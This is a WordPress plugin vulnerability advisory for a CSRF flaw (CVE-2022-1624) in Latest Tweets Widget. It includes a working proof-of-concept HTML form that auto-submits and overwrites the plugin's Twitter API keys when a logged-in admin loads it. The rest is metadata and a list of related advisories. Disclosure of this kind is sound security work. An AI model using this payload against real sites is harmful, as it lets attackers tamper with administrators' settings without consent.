Latest Tweets Widget <= 1.1.4 – Arbitrary Settings Update via CSRF | CVE 2022-1624 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=twitter-api-admin" method="POST">
    <input type="text" name="saf_twitter[consumer_key]" value="hacked">
    <input type="text" name="saf_twitter[consumer_secret]" value="hacked">
    <input type="text" name="saf_twitter[access_key]" value="">
    <input type="text" name="saf_twitter[access_secret]" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

latest-tweets-widget

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

06e547fd-cddf-4294-87be-54f58d6138a7

Timeline

Publicly Published

2022-05-18 (about 2 years ago)

Added

2022-05-18 (about 2 years ago)

Last Updated

2023-02-09 (about 1 years ago)

Other

Published

Title

Published

2022-11-01

Title

Homepage Pop-up <= 1.2.5 - CSRF

Published

2023-10-16

Title

Widgets for Google Reviews < 10.9.1 - Arbitrary Settings Update via CSRF

Published

2023-10-17

Title

Stripe Gateway < 7.6.1 - Cross-Site Request Forgery

Published

2022-09-06

Title

Booking Calendar < 9.2.2 - Arbitrary Translation Update via CSRF

Published

2023-11-23

Title

Seraphinite Post .DOCX Source < 2.16.7 - Settings Update/Reset/Import via CSRF